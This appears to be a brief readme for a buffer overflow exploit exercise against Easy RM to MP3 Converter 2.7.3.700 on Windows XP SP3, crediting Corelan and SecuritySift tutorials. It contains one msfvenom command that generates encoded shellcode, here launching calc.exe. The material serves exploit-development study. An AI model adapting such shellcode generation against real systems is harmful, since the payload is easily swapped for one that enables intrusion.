- WIN XP SP3
- Easy RM to MP3 Converter 2.7.3.700
Based on article: https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
inspired by: http://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/
msfvenom -a x86 -p windows/exec CMD=calc.exe -f python -b '\x00' --var-name shellcode -e x86/shikata_ga_nai EXITFUNC=seh